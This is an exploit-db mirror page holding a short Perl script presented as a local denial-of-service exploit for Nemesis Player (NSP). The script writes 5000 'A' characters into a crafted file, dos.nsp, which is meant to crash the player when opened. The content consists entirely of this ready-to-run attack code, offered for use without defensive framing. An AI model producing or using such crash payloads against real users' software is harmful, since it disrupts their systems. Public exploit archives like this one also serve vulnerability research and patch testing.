exploit-db-mirror/exploits/windows/dos/11132.pl
Offensive Security d304cc3d3e DB: 2017-11-24
116602 new exploits

Too many to list!
2017-11-24 20:56:23 +00:00

13 lines
No EOL
390 B
Perl
Executable file

#!/usr/bin/perl
#Exploit Title: Nemesis Player (NSP) Local Denial of Service (DoS) Vulnerability
#Author:Vulnerability Discovered By Rehan Ahmed (rehan@rewterz.com)
#Vendor:http://www.nsplayer.org
#Version:1.1 Beta/2.2
#Tested On: WinXP SP2
my $boom="\x41" x 5000;
my $file="dos.nsp";
open($FILE,">$file");
print $FILE $boom;
close($FILE);
print "File Successfully Created\n";